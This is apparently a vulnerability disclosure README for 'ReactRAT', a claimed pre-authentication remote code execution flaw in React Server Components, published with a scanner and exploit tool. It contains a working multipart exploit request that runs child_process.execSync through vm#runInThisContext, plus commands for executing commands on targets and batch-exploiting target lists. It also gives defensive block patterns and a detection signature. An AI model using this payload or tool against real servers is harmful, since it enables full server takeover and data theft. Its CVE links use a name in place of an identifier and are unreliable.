Security Research by schema.cx
"Control is an illusion. It's the systems we build that control us—unless we understand them first."

• Disclaimer & Legal Notice
• Executive Summary
• Technical Description
• Affected Systems
• Proof of Concept
• Impact Assessment
• Mitigation & Remediation
• Responsible Disclosure Timeline
• References
• Attribution

THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY

STOP. READ THIS BEFORE PROCEEDING.

This repository contains proof-of-concept code for a critical security vulnerability. By accessing, downloading, or using any materials in this repository, you acknowledge and agree to the following:

1. Written Authorization Required: You MUST have explicit, written permission from the system owner before conducting any security testing. Verbal agreements are insufficient.

2. Scope Limitations: Testing must be confined to systems explicitly listed in your authorization. "Scope creep" is not permitted.

3. Applicable Laws: Unauthorized access to computer systems violates:

   • United States: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
   • European Union: Directive 2013/40/EU on attacks against information systems
   • United Kingdom: Computer Misuse Act 1990
   • Australia: Criminal Code Act 1995, Division 477-478
   • Other jurisdictions: Similar computer crime laws apply globally

THE AUTHORS AND CONTRIBUTORS OF THIS REPOSITORY:

• Accept NO responsibility for misuse of this tool
• Provide NO warranty, express or implied
• Are NOT liable for any damages arising from use or inability to use this software
• Do NOT endorse illegal activities of any kind

• Never test without permission — even if you "just want to check"
• Document everything — maintain detailed logs of all testing activities
• Minimize impact — use the least invasive methods possible
• Report responsibly — follow coordinated disclosure practices
• Respect privacy — do not exfiltrate or retain sensitive data

"The question isn't whether we can exploit the vulnerability. It's whether we should, and for what purpose."

ReactRAT is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components in React 19.x and Next.js 15.x-16.x applications.

This vulnerability allows any unauthenticated attacker with network access to a vulnerable application to execute arbitrary commands on the server. The attack requires no credentials, no user interaction, and can be fully automated. Successful exploitation leads to:

• Complete server compromise — attackers gain full control of the underlying system
• Data breach potential — access to databases, environment variables, secrets, and user data
• Lateral movement — compromised servers can be used to attack internal networks
• Supply chain risk — production systems serving millions of users may be affected

"People trust systems because they don't understand them. That trust is a vulnerability."

The vulnerability exists in React's Flight protocol implementation within the requireModule function. This function uses bracket notation to access module exports based on user-controlled input, without validating that the requested property is an own property of the module.

Vulnerable Code Location:

react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Function: requireModule (approximately line 2546-2558 in v19.0.0)

Vulnerable Pattern:

function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  // ... async handling ...
  return moduleExports[metadata[2]];  // ← VULNERABLE: No hasOwnProperty check
}

The attack leverages JavaScript's prototype chain traversal:

1. Entry Point: Attacker sends a malicious multipart form request to a Server Action endpoint
2. Payload Injection: The $ACTION_0:0 field contains JSON with attacker-controlled id (module#export format) and bound (arguments) properties
3. Prototype Access: By specifying exports like constructor or accessing prototype properties, attackers can reference built-in Node.js modules
4. RCE Gadgets: Functions like vm.runInThisContext, child_process.execSync, or fs.readFileSync execute with attacker-supplied arguments

HTTP POST /formaction
    ↓
decodeAction(formData, serverManifest)
    ↓
loadServerReference(manifest, value.id, value.bound)
    ↓
resolveServerReference(config, id)  // Parses "module#export" format
    ↓
requireModule(metadata)
    ↓
moduleExports[metadata[2]]  // Prototype chain access → RCE

POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--

"Every system has a door. The question is whether you built the lock yourself—or inherited it from someone who never expected visitors."

1. React Server Components Enabled: Application uses RSC with Server Actions
2. Vulnerable React Version: One of the affected versions is in use
3. Network Access: Attacker can reach Server Action endpoints
4. Dangerous Modules in Bundle: For direct RCE, modules like vm, child_process, or fs must be in the webpack bundle

• Runtime: Node.js (any version supporting React 19)
• Framework: Next.js App Router or custom RSC implementation
• No additional configuration required to be vulnerable

This repository includes a comprehensive Python-based security scanner with multiple operation modes.

reactrat/
├── README.md                    # This file
├── __init__.py                  # Python package init
├── reactrat.py                  # Main unified scanner (10 modes)
├── requirements.txt             # Python dependencies
├── tests/                       # Unit tests (76 test cases)
│   └── test_scanner.py          # Comprehensive test suite
└── docs/
    ├── TECHNICAL-ANALYSIS.md   # Deep dive into vulnerability
    └── VULNERABLE-PACKAGES.md   # Affected package versions

Installation:

# From repository root
pip install -r requirements.txt

# Optional: Install YAML support for pnpm lockfiles
pip install pyyaml

# Optional: Install packaging for enhanced version comparison
pip install packaging

Vulnerability Scan:

# Check if target is vulnerable
python reactrat.py scan https://target.com

Gadget Detection:

# Identify available RCE gadgets
python reactrat.py exploit https://target.com --detect-gadgets

Command Execution (with authorization):

# Execute command on vulnerable target
python reactrat.py exploit https://target.com -c "whoami"

Batch Testing:

# Test multiple targets from file
python reactrat.py batch -f targets.txt -o results.json

Automated Scanning with Verification:

# Comprehensive scan with exploit verification
python reactrat.py auto -f targets.txt -o report.txt

Local Project Scanning:

# Scan current directory for vulnerable dependencies
python reactrat.py local-scan .

# Scan with SARIF output (GitHub Security tab compatible)
python reactrat.py local-scan ./my-project --format sarif -o results.sarif

# Generate HTML report
python reactrat.py local-scan ./my-project --format html -o report.html

SBOM Scanning:

# Scan a CycloneDX SBOM file
python reactrat.py sbom-scan ./sbom.json

# Output as JSON
python reactrat.py sbom-scan ./sbom.json --format json

Auto-Fix Vulnerabilities:

# Preview what would be fixed
python reactrat.py fix --dry-run

# Apply fixes to package.json
python reactrat.py fix

# Fix and run npm/yarn/pnpm install
python reactrat.py fix --install

Vercel Pre-Deployment Check:

# Run as part of CI/CD - fails on vulnerabilities
python reactrat.py vercel-check

# Warn but don't fail
python reactrat.py vercel-check --no-fail

Vulnerable Target:

[+] VULNERABLE to ReactRAT!
    Framework: Next.js
    Version: 15.1.0
    Confidence: HIGH
    
Available Gadgets:
  ✓ vm#runInThisContext
  ✓ child_process#execSync
  ✓ fs#readFileSync
  ✓ fs#writeFileSync

Patched Target:

[-] Not vulnerable or unable to determine
    Framework detected: Next.js
    Version: 15.2.0 (patched)

• Framework Detection: Identifies Next.js/React applications before exploitation
• WAF/CDN Detection: Recognizes Cloudflare, Akamai, Incapsula, AWS WAF, Azure WAF, and more
• Multiple RCE Gadgets: vm, child_process, fs, module exploitation paths
• Two-Step RCE: Alternative exploitation via fs#writeFileSync + module#_load
• Verification: Confirms exploits with proof-of-execution
• False Positive Prevention: Smart filtering of HTML/WAF responses
• Reporting: Text, JSON, SARIF, and HTML output formats
• Lockfile Parsing: Support for npm, pnpm, and yarn lockfiles
• SBOM Analysis: CycloneDX Software Bill of Materials scanning
• Workspace Detection: npm/pnpm/yarn/Lerna monorepo support
• CI/CD Integration: SARIF output for GitHub Security tab

For complete documentation, see SCANNER_README.md.

"A tool is only as dangerous as the intent behind it. In the right hands, a weapon becomes a shield."

• Environment Variables: Database credentials, API keys, secrets
• Source Code: Application logic, proprietary algorithms
• User Data: Personal information, authentication tokens
• System Files: /etc/passwd, SSH keys, cloud credentials
• Internal Networks: Pivot point for further attacks

• Code Injection: Backdoors in application files
• Data Manipulation: Database modifications
• Configuration Changes: Security settings, access controls
• Persistence Mechanisms: Cron jobs, startup scripts, SSH keys

• Service Disruption: Process termination, resource exhaustion
• Data Destruction: File deletion, database drops
• Ransomware Deployment: Encryption of critical files
• Complete System Compromise: Full administrative control

1. Data Breach: Attacker reads .env files containing database credentials, exfiltrates customer data

2. Cryptominer Installation: Attacker writes mining script, adds cron job for persistence

3. Supply Chain Attack: Attacker modifies source code in production, serving malicious content to users

4. Lateral Movement: Compromised server used to attack internal databases, APIs, and services

5. Ransomware: Attacker encrypts application files, demands payment for decryption keys

1. Upgrade React Immediately

   npm update react react-dom react-server-dom-webpack

   Target versions: 19.0.1+, 19.1.2+, or 19.2.1+

2. Verify Patch Application

   npm ls react

   Ensure no vulnerable versions remain in your dependency tree

Block requests containing these patterns:

# Request body patterns to block
#constructor
#__proto__
#prototype
vm#runInThisContext
vm#runInNewContext
child_process#execSync
child_process#execFileSync
child_process#spawnSync
module#_load
fs#readFileSync
fs#writeFileSync

Exclude dangerous packages from webpack bundling:

// next.config.js
module.exports = {
  serverExternalPackages: [
    'sharp',
    'puppeteer',
    'execa',
    'shelljs',
    'vm2'
  ]
}

Log Patterns to Monitor:

• Unusual $ACTION_REF_ or $ACTION_ID_ fields in request bodies
• POST requests to /api/* endpoints with multipart form data containing JSON
• Error messages referencing constructor, prototype, or unexpected module access

Intrusion Detection Signatures:

alert http any any -> $HOME_NET any (
  msg:"ReactRAT Exploit Attempt";
  content:"$ACTION_";
  content:"#constructor"; distance:0;
  sid:2025551820; rev:1;
)

1. Dependency Auditing: Regular scans with npm audit, Snyk, or similar tools
2. Security Updates: Automated dependency updates via Dependabot or Renovate
3. Input Validation: Never trust user input in property access patterns
4. Least Privilege: Run applications with minimal necessary permissions
5. Network Segmentation: Isolate production systems from internal networks

"Patching isn't just about fixing what's broken. It's about closing the doors you didn't know were open."

This disclosure follows CERT/CC Vulnerability Disclosure Guidelines and ISO/IEC 29147:2018 standards for coordinated vulnerability disclosure.

• CVE Entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=ReactRAT
• NVD Entry: https://nvd.nist.gov/vuln/detail/ReactRAT

• React Security Advisories: https://github.com/facebook/react/security/advisories
• Next.js Security: https://nextjs.org/docs/security

• Technical Analysis (Deep Dive)
• Vulnerable Package Analysis

• OWASP - Prototype Pollution
• Node.js VM Module Security
• React Server Components RFC

This proof-of-concept was developed by the security research team at schema.cx.

Repository: https://github.com/ejpir/reactrat

We would like to thank:

• The React and Next.js security teams for their rapid response
• The security research community for collaborative analysis
• MITRE for CVE coordination

This project is released for educational and authorized security research purposes only.

By using this software, you agree to:

1. Use it only on systems you own or have explicit authorization to test
2. Follow responsible disclosure practices
3. Not use it for malicious purposes
4. Accept all responsibility for your actions

"We don't hack to destroy. We hack to understand. And understanding is the first step to building something better."

schema.cx — Security Research for a Safer Digital World